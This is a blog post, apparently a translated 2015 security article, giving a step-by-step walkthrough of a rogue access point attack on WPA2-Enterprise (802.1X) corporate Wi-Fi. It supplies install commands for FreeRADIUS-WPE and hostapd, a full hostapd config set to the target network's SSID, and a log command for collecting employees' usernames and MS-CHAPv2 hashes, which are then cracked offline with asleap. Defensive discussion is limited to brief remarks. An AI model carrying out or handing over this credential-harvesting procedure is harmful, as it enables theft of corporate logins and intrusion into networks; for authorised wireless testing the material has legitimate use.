Mickey · 2015/09/02

0x01 Introduction


For attacks on open (passwordless) enterprise wireless networks there are, in my view, two classic methods: the Evil Twin and Karma. Karma can be seen as an evolution of the Evil Twin: the attacker simply listens for the probe requests that clients broadcast for the SSIDs they remember and answers them, which puts the attacker in a man-in-the-middle position that the victim rarely notices. There was also a misconception that hidden SSIDs were not affected by Karma, but in reality a client that has ever connected to a hidden SSID will broadcast probe requests for it. Although Karma attacks are over a decade old, they still work on Mac OS X, Ubuntu and older versions of Android; the default configuration of Windows 7 protects against them.

For encrypted wireless networks, personal networks mostly use WPA2-PSK, a pre-shared key, to restrict access. Enterprise wireless networks instead use WPA2-Enterprise, where a RADIUS server provides each user with an individual username and password for 802.1X authentication.

0x02 Implementation process


My attack targets the relatively secure 802.1X setup of enterprise wireless networks, where a RADIUS server provides individual usernames and passwords. It uses hostapd to act as the wireless access point, a patched FreeRADIUS-WPE to capture the MS-CHAPv2 challenge/response hashes, and finally asleap to crack the password offline.

Equipment required:

TP-LINK TL-WN821N
Kali 1.1.0

Install the prebuilt package freeradius-server-wpe_2.1.12-1_i386.deb:

```bash
wget https://github.com/brad-anton/freeradius-wpe/raw/master/freeradius-server-wpe_2.1.12-1_i386.deb
dpkg --install freeradius-server-wpe_2.1.12-1_i386.deb
ldconfig
cd /usr/local/etc/raddb/certs
./bootstrap && ldconfig
```

Alternatively, build it from source with the WPE patch applied:

```bash
git clone https://github.com/brad-anton/freeradius-wpe.git
wget ftp://ftp.freeradius.org/pub/freeradius/freeradius-server-2.1.12.tar.bz2
tar jxvf freeradius-server-2.1.12.tar.bz2
cd freeradius-server-2.1.12
patch -p1 < ../freeradius-wpe/freeradius-wpe.patch   # patch file from the cloned repo
./configure && make && make install
```

Run radiusd -X to start the server in debug mode and verify that the installation succeeded. If it fails with

```text
Failed binding to /usr/local/var/run/radiusd/radiusd.sock: No such file or directory
```

you need to create the missing directory:

```bash
mkdir -p /usr/local/var/run/radiusd/
```

To install hostapd, run the following commands:

```bash
wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
tar zxvf hostapd-2.0.tar.gz
cd hostapd-2.0/hostapd/
cp defconfig .config
make
```

If the build fails with:

```text
../src/drivers/driver_nl80211.c:19:31: fatal error: netlink/genl/genl.h: No such file or directory
compilation terminated.
make: *** [../src/drivers/driver_nl80211.o] Error 1
```

install the libnl development package and run make again:

```bash
sudo apt-get install libnl1 libnl-dev
```

Then write the hostapd-wpe.conf file as follows:

```ini
interface=wlan0
driver=nl80211
ssid=corp-lobby
country_code=DE
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=CCMP
rsn_pairwise=CCMP
```

Set ssid= to the SSID of your target enterprise network (corp-lobby in this example). auth_server_shared_secret must match the secret configured for localhost in the FreeRADIUS clients.conf; testing123 is the FreeRADIUS default. Run hostapd -dd hostapd-wpe.conf to bring up the rogue access point.

If an employee whose device has this SSID saved is within range, the device will automatically connect to your rogue hotspot, provided the client does not validate the RADIUS server's certificate. You can then run

```bash
tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
```

to see the captured username together with the MS-CHAPv2 challenge and response hashes.

With the challenge and response in hand, the asleap tool can run a dictionary attack against them offline.

Enterprise wireless networks that use RADIUS for 802.1X authentication are relatively secure as long as each user's password is complex enough. Researchers abroad later extended this kind of attack by integrating the Heartbleed vulnerability into tools that target both wireless clients and access points; that project is called Cupid, see www.sysvalue.com/en/heartble…

0x03 Reference articles


phreaklets.blogspot.sg/2013/06/cra…
insights.sei.cmu.edu/cert/2015/0…